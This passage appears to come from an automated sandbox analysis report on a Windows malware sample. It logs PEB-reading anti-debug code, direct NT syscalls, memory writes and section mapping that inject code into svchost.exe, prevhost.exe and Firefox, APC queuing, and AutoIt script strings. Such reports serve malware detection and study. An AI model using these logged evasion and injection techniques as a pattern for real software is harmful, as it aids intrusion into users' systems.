                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]2_2_02FFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]2_2_02F5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]2_2_02FBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]2_2_02F30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]2_2_02F60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h]2_2_02F42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]2_2_02F6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]2_2_02FBC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]2_2_02FBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]2_2_02F649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]2_2_02FFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]2_2_02FC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]2_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]2_2_02FBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]2_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov edx, dword ptr fs:[00000030h]2_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E mov eax, dword ptr fs:[00000030h]2_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0946 mov eax, dword ptr fs:[00000030h]2_2_02FB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB892A mov eax, dword ptr fs:[00000030h]2_2_02FB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC892B mov eax, dword ptr fs:[00000030h]2_2_02FC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC912 mov eax, dword ptr fs:[00000030h]2_2_02FBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]2_2_02F28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28918 mov eax, dword ptr fs:[00000030h]2_2_02F28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]2_2_02FAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE908 mov eax, dword ptr fs:[00000030h]2_2_02FAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68EF5 mov eax, dword ptr fs:[00000030h]2_2_02F68EF5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36EE0 mov eax, dword ptr fs:[00000030h]2_2_02F36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]2_2_02FCAEB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FCAEB0 mov eax, dword ptr fs:[00000030h]2_2_02FCAEB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]2_2_02FBCEA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]2_2_02FBCEA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCEA0 mov eax, dword ptr fs:[00000030h]2_2_02FBCEA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]2_2_02F2AE90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]2_2_02F2AE90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2AE90 mov eax, dword ptr fs:[00000030h]2_2_02F2AE90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004F68 mov eax, dword ptr fs:[00000030h]2_2_03004F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62E9C mov eax, dword ptr fs:[00000030h]2_2_02F62E9C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62E9C mov ecx, dword ptr fs:[00000030h]2_2_02F62E9C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36E71 mov eax, dword ptr fs:[00000030h]2_2_02F36E71
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0E7F mov eax, dword ptr fs:[00000030h]2_2_02FB0E7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0E7F mov eax, dword ptr fs:[00000030h]2_2_02FB0E7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0E7F mov eax, dword ptr fs:[00000030h]2_2_02FB0E7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2EE5A mov eax, dword ptr fs:[00000030h]2_2_02F2EE5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6E20 mov eax, dword ptr fs:[00000030h]2_2_02FC6E20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6E20 mov eax, dword ptr fs:[00000030h]2_2_02FC6E20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6E20 mov ecx, dword ptr fs:[00000030h]2_2_02FC6E20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004FE7 mov eax, dword ptr fs:[00000030h]2_2_03004FE7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28E1D mov eax, dword ptr fs:[00000030h]2_2_02F28E1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5AE00 mov eax, dword ptr fs:[00000030h]2_2_02F5AE00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5AE00 mov eax, dword ptr fs:[00000030h]2_2_02F5AE00
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00570B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00570B62
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00542622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00542622
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0053083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0053083F
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005309D5 SetUnhandledExceptionFilter,0_2_005309D5
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00530C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00530C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\prevhost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: NULL target: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: NULL target: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeThread register set: target process: 6520Jump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeThread APC queued: target process: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeJump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 230C008Jump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00571201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00571201
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00552BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00552BA5
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_0057B226 SendInput,keybd_event,0_2_0057B226
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_005922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_005922DA
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\4sfN3Gx1vO.exe"Jump to behavior
                Source: C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exeProcess created: C:\Windows\SysWOW64\prevhost.exe "C:\Windows\SysWOW64\prevhost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\prevhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00570B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00570B62
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00571663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00571663
                Source: 4sfN3Gx1vO.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: YZKoIsKkwLJWPq.exe, 00000004.00000000.2319459138.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315196092.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315435200.0000000001A01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: 4sfN3Gx1vO.exe, YZKoIsKkwLJWPq.exe, 00000004.00000000.2319459138.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315196092.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315435200.0000000001A01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: YZKoIsKkwLJWPq.exe, 00000004.00000000.2319459138.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315196092.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315435200.0000000001A01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: YZKoIsKkwLJWPq.exe, 00000004.00000000.2319459138.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000004.00000002.3315196092.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, YZKoIsKkwLJWPq.exe, 00000006.00000002.3315435200.0000000001A01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00530698 cpuid 0_2_00530698
                Source: C:\Users\user\Desktop\4sfN3Gx1vO.exeCode function: 0_2_00588195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00588195
